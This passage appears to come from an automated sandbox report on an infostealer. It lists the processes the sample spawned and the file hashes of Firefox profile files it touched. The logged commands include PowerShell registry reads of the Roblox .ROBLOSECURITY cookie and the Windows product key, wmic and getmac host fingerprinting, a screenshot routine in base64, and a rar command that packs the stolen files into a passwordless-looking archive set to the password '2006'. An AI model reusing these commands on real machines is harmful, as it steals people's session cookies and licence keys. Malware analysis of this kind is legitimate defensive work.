ABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wkh4t1sn\wkh4t1sn.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61B7.tmp" "c:\Users\Admin\AppData\Local\Temp\wkh4t1sn\CSC69C5BE3D6C0C44FC896D2263CA2F5C80.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.4.830145772\1605352394" -childID 3 -isForBrowser -prefsHandle 4968 -prefMapHandle 4536 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {734e8bd1-46a7-4a79-8b71-24bee9c0e9c1} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 1516 223be49e858 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.5.1980498284\963284024" -childID 4 -isForBrowser -prefsHandle 5316 -prefMapHandle 5320 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3cd174f8-c3be-4fd7-a051-470bc97a90a5} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5308 223bc9bf258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.6.1486222084\1260400303" -childID 5 -isForBrowser -prefsHandle 5504 -prefMapHandle 5512 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {09df27fd-de4d-4632-be21-80b1ce52955f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5496 223bc9c1c58 tab
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\JJJed.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI43562\rar.exe a -r -hp"2006" "C:\Users\Admin\AppData\Local\Temp\JJJed.zip" *
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.7.2004441443\722180251" -childID 6 -isForBrowser -prefsHandle 5872 -prefMapHandle 5900 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d4b7970-6fa1-47ec-a704-f4cdc1db2166} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5860 223b8fc9558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.8.2076159349\910925423" -parentBuildID 20230214051806 -prefsHandle 6260 -prefMapHandle 6268 -prefsLen 27697 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e9908bd0-3c33-448b-9046-35dda54bd78f} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6284 223b5b0e858 rdd
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.9.366663673\6351698" -parentBuildID 20230214051806 -sandboxingKind 1 -prefsHandle 3932 -prefMapHandle 4356 -prefsLen 27697 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {38bfa30a-fe85-4b87-8033-afd19c3c2296} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6480 223b5b97558 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.10.1828842400\1531533435" -childID 7 -isForBrowser -prefsHandle 6596 -prefMapHandle 4420 -prefsLen 27697 -prefMapSize 235121 -jsInitHandle 1268 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c0ae4b0-0f04-4850-ba26-057424ef0730} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 6608 223b5b99958 tab
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4d4 0x328
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2460.11.2118964846\1148024191" -parentBuildID 20230214051806 -sandboxingKind 0 -prefsHandle 5428 -prefMapHandle 5444 -prefsLen 27697 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {368352ac-3f94-4c21-ae16-1b214c431b85} 2460 "\\.\pipe\gecko-crash-server-pipe.2460" 5416 223bb20f258 utility
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.0.402255121\1251719960" -parentBuildID 20230214051806 -prefsHandle 1804 -prefMapHandle 1796 -prefsLen 22341 -prefMapSize 235121 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4794aab3-583d-4b73-a00b-95b913515f55} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 1884 1aa925f6458 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.1.481195266\740456772" -parentBuildID 20230214051806 -prefsHandle 2424 -prefMapHandle 2420 -prefsLen 22377 -prefMapSize 235121 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {63c935fa-ad64-4e29-b80c-99acabaabc4f} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2452 1aa86789f58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.2.1675031286\1313524578" -childID 1 -isForBrowser -prefsHandle 2860 -prefMapHandle 2980 -prefsLen 22415 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3354eb02-5569-416b-b330-c93deb3d81b4} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2952 1aa96436058 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.3.424992339\993516848" -childID 2 -isForBrowser -prefsHandle 3908 -prefMapHandle 3904 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2c42cee9-12ff-4fd8-b622-f5bf7463d06a} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 3920 1aa98431b58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.4.1362514700\936678985" -childID 3 -isForBrowser -prefsHandle 5000 -prefMapHandle 4980 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c7470e26-aa8b-4ca3-9d37-a293482b0052} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5012 1aa9a6fde58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.5.1621330121\425148469" -childID 4 -isForBrowser -prefsHandle 5160 -prefMapHandle 5164 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c28d81eb-9e81-41ae-9413-55c155ea25cc} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5148 1aa9ad2e558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.6.9664168\850547795" -childID 5 -isForBrowser -prefsHandle 5352 -prefMapHandle 5356 -prefsLen 27881 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f03d1cd4-be71-4c9b-abff-6a1b4147d1e2} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5340 1aa9ad2b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.7.435547975\693768245" -childID 6 -isForBrowser -prefsHandle 5680 -prefMapHandle 5676 -prefsLen 28105 -prefMapSize 235121 -jsInitHandle 1308 -jsInitLen 246560 -a11yResourceId 64 -parentBuildID 20230214051806 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {39458ac9-489d-46d2-b608-b2ff155eda80} 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 5664 1aa98c4d558 tab
Network
Files
memory/2664-413-0x00007FFEDF8A0000-0x00007FFEDFA11000-memory.dmp
memory/2664-409-0x00007FFED0C70000-0x00007FFED0FE7000-memory.dmp
memory/2664-407-0x00007FFEDF510000-0x00007FFEDF53E000-memory.dmp
memory/2664-405-0x00007FFEDFC80000-0x00007FFEDFC99000-memory.dmp
memory/2664-399-0x00007FFEE4EE0000-0x00007FFEE4F04000-memory.dmp
memory/2664-398-0x00007FFED1460000-0x00007FFED18C5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 4a64cf8fbdf898d609bc67928138f664 |
| SHA1 | 28ebfcc18213a84f1a1a7a6d4d387a134e80b741 |
| SHA256 | 0e3d622114217a2e32bb337a25d4880c2be1e952befeb07e4475a6e5250ed0f3 |
| SHA512 | 22505b0087d9f56ffa9458b908d766d16c8219d0dd210ea47b23df216e19398a3a2f84983688b6eb338c4b2dc4f75bcbf18f3b72dce85c9921187ae91069efef |
memory/2664-489-0x00007FFEDF880000-0x00007FFEDF895000-memory.dmp
memory/2664-488-0x00007FFED0C70000-0x00007FFED0FE7000-memory.dmp
memory/2664-487-0x00007FFED0FF0000-0x00007FFED10A7000-memory.dmp
memory/2664-486-0x00007FFEE3D80000-0x00007FFEE3D8D000-memory.dmp
memory/2664-485-0x00007FFEDF510000-0x00007FFEDF53E000-memory.dmp
memory/2664-484-0x00007FFEDFC80000-0x00007FFEDFC99000-memory.dmp
memory/2664-483-0x00007FFEDF8A0000-0x00007FFEDFA11000-memory.dmp
memory/2664-482-0x00007FFEDFE80000-0x00007FFEDFE9E000-memory.dmp
memory/2664-481-0x00007FFEE01E0000-0x00007FFEE01F8000-memory.dmp
memory/2664-480-0x00007FFEDFEA0000-0x00007FFEDFECC000-memory.dmp
memory/2664-479-0x00007FFEE4EE0000-0x00007FFEE4F04000-memory.dmp
memory/2664-478-0x00007FFEE4DD0000-0x00007FFEE4DDF000-memory.dmp
memory/2664-477-0x00007FFEDFD00000-0x00007FFEDFD0D000-memory.dmp
memory/2664-476-0x00007FFED1340000-0x00007FFED1458000-memory.dmp
memory/2664-462-0x00007FFED1460000-0x00007FFED18C5000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | a40e0011746d76d36f068e5d030dc68e |
| SHA1 | 5976cf34f1667a66381e23465881e5305b83e769 |
| SHA256 | 299ce4ed1961c7795b9180d6149a355f1409e113c65617f7522b7c1eaec85c3b |
| SHA512 | b4129e117d350209d6e4e9090945d17fd883d27e008a1f1b16bb2f181a63afbfee86fcf3c7bd1075e6c36bda8dc20a49b082992eed719030521b8814841c2a25 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\entries\4B1F09000B64F09F2E43F1852A2051FF069F4083
| MD5 | 119067badabd70a92a8ff348145627db |
| SHA1 | 8b2e7014afc3347738e233a9ed6faf52c52eea59 |
| SHA256 | 2503ec3a432795d3e0f09d3db209a66ea80e0bef98126cc3f105bde1efdbb5e1 |
| SHA512 | 2f70a7da0c00fd540a789210abcbd59992f0c46584294258d78f60bf93475eeb62f98dcee9a4da84803e1ac98a536ccbe4c7efa7f838175d080fcae06ab66548 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\8167
| MD5 | ff547d9ece7e8765b727bd70d5dcf082 |
| SHA1 | 9197f296e739f0268e470c60624f67332222a7db |
| SHA256 | c3df104471ec628adaae1f3064fdc8f996db5e804aad716b1d53a4a697f73977 |
| SHA512 | 5761f969f23ffe9e2bfd86c19c617b4484556e9a7daa1601db6adffec15ca349f620f2912031ddae3c0ed7893a6dc11e9247104820bef5ffdb780185f720b7ec |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\10658
| MD5 | 3258af6a4f2131627bbe1c51f565c95f |
| SHA1 | 9131307e5f4084cfbf87e0099972ae1789186d70 |
| SHA256 | 48729a002ab294ed733acadbf577a4209d2a0379b105362a690f12cc4a84d750 |
| SHA512 | cb0301405a06c64a6339b96ae5527f20b69a2da62060b957a1a892acbbd9532660b8104477d909eb03b9f10d2c31ed93172eb72b57da3d491887d8f8f07e7662 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\entries\E4215D13DC0A46D42A40208857C1B23A943B3A95
| MD5 | 267abf9cb6259040a5d27881fc77c3b0 |
| SHA1 | b146206b36f9515abf745311ed8d05a0681a998b |
| SHA256 | d55546faca13c562fd3d0903ede69656d0e3bcb39455e404fae00ce0485c6c01 |
| SHA512 | 0416b0ef1e19b3908f0dae94d990187d209b8f8ac32507b71033f6176ffb1c344910567d2088b5d851f62bb63f82d2edd9bda9c0bcca468adb921fa11df69efd |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\cache2\doomed\1322
| MD5 | 83854401893ad354be48b03bab41bb06 |
| SHA1 | dbbbc08fccaa8bb08ab203c1a52fd9f1080b5d79 |
| SHA256 | 0d06282d2fe7b98c644f85fc0040164fab587e411789ef5f8881005443f785cf |
| SHA512 | 322a7ef649c2d4a15edc3f360746f800623e9a69394a8eb5eb1730b9dc88f403a0952c0cbd0698642970cd4f403b24c6033c154781c1fb61cc27d243f2672942 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs-1.js
| MD5 | 28f4695156f66a45f6b9abd95d43b47d |
| SHA1 | 250ed4848ba3343506880c6fa3a410e4b8043f4f |
| SHA256 | 7ce36233660ec010a839f785fea84d219f5f68b98ba8e15871335bb2e735e0d9 |
| SHA512 | 6cee634b473588d3dca16bcecb1b01e2c9fb11bcacc4717d7ed5d5072f2c86873e654e4341159075d8eab9260b5ad97eb171581f69e0a90287409f6269041ea6 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore.jsonlz4
| MD5 | 121a97fdf7e1b45f5a70ca5e4dabceeb |
| SHA1 | c147b24e0dfb2b33b4a9b7f4f9f60d92cfaa7ac2 |
| SHA256 | 5b997de57753b64b088543cbbc81c1515990c65813b22ef8da3bc6d40d15cc4b |
| SHA512 | d12166c5b92a4b4daa71d09f19a6d8ebead0481bfa1b578d489137a99e5b8b3866ed97320964f8e4e2991d3cddcb78154cc96f3458a28f5f51ba48cfc3a85157 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionCheckpoints.json.tmp
| MD5 | ea8b62857dfdbd3d0be7d7e4a954ec9a |
| SHA1 | b43bc4b3ea206a02ef8f63d5bfad0c96bf2a3b2a |
| SHA256 | 792955295ae9c382986222c6731c5870bd0e921e7f7e34cc4615f5cd67f225da |
| SHA512 | 076ee83534f42563046d25086166f82e1a3ec61840c113aec67abe2d8195daa247d827d0c54e7e8f8a1bbf2d082a3763577587e84342ec160ff97905243e6d19 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionCheckpoints.json.tmp
| MD5 | c4ab2ee59ca41b6d6a6ea911f35bdc00 |
| SHA1 | 5942cd6505fc8a9daba403b082067e1cdefdfbc4 |
| SHA256 | 00ad9799527c3fd21f3a85012565eae817490f3e0d417413bf9567bb5909f6a2 |
| SHA512 | 71ea16900479e6af161e0aad08c8d1e9ded5868a8d848e7647272f3002e2f2013e16382b677abe3c6f17792a26293b9e27ec78e16f00bd24ba3d21072bd1cae2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 6b59453e29dbd5949754b1166ea09e52 |
| SHA1 | 58e6ffe90d87e7ec96fd00d7e2d56cf8bf396b80 |
| SHA256 | 67800a30bb6c13bbf497677d76eab1901c77977b596852edba40b6f0405bb04b |
| SHA512 | 4bf3bfc67c1e8ae084663d073f674ca87febcf268bcbd0a3c69057210d2452e75fdb0808cea3a6ec0538ad45f801e786ac012643e303bbb3035d97253873851b |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs.js
| MD5 | a0817d2781c164311419326d16a70514 |
| SHA1 | 390add6524331331a59e0fae127a00f89bbaab77 |
| SHA256 | 39a0f31e681399c6bbb464960c4196cdbb2a8ccbaa10991c579f0a70c1200c5d |
| SHA512 | 53a0a7251113d3fcd96354258cacf477c63ece0be09cd3a533c65c8ef581dae690e7ccc96c93ce5f559291737e113d0c3c04f767166b8361dac4d6b19c44060c |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\prefs-1.js
| MD5 | a1d2fd508af81843b236a47aee91e13c |
| SHA1 | 79bb224065205c55a6a0076b9a0f0431799b09b4 |
| SHA256 | 058c289b86947dc4f70b011c8cd9a69fe5737088800b6d0e7dd75df63349a46b |
| SHA512 | cf9324a8de62b606b68072a4455b0edebf59d72899e2e531581a87e54152ef066a03774ee062dfd326a8a4beb42eb8538417ab698016ea4a8deb1f26e2b015be |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 15c0c148e33972f614596e82fa3f0152 |
| SHA1 | 756a5bb1ab5cc7c65478c77ab0a142a3ef775183 |
| SHA256 | 3cc5ef561b90220f5e0f4101b2da07694b3bd6fa248532b56bb9ba47eb7733d8 |
| SHA512 | 306de5b984fddadb90a5ce2138dc4919c32d49cf486a0b24cd3d928c952c923b6c8153f4659c32eef8bc06cf0d529cc86de31e302b79742c40b453bb5792ed2a |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 34863f7d94ee53ddb1f89286a32d824a |
| SHA1 | 443265a0ddfd712b9c10dbf8a214a3574e578d9f |
| SHA256 | 14df88ae0008a4e349fb8d17c58212d58d8fa0c68ba3cb937a0e8abc9933d28b |
| SHA512 | 80828732fad168daaebd7fb4a093a1646e8dd474f863ff33677a787f94078755dfb0558633e0d2c0d7801f0eee278690773afeaff792ba0cde5650181aee2e55 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | 000e41a7239f03e34e262e3ecb2999e1 |
| SHA1 | 1788505854101bb5ff53e78316147c088ba342e2 |
| SHA256 | 93b7456dc8f5fb68f61dda3a821aa36d7da9e16c2639d68b8124a9d5d8452e79 |
| SHA512 | 0abaa2127d920ac721c8546794deaa3b4430b4012374acb67e1b5f9d2f5b26495cb440a199036b4c628de8cd43a51c5dd3accf521d32d9333ad3cc797a526a9e |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7jyxcjs8.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | c760b4b24833848a7bb57d435b6a91c9 |
| SHA1 | 9e7e872e926dd793c7cbd7eea1c74b8657a32b2a |
| SHA256 | b3bf15e41bb189b92b6baaf55a3e47a38f74c5d9c69a5da57f757045936d9c4c |
| SHA512 | 8d8283b9679aeb08b871b1961e127d4fd57339f914cf2bb6ded3a43768dd3395cbfae5af556a83db87abd1361bb874508b8c060957c371008606fdc40050b2e2 |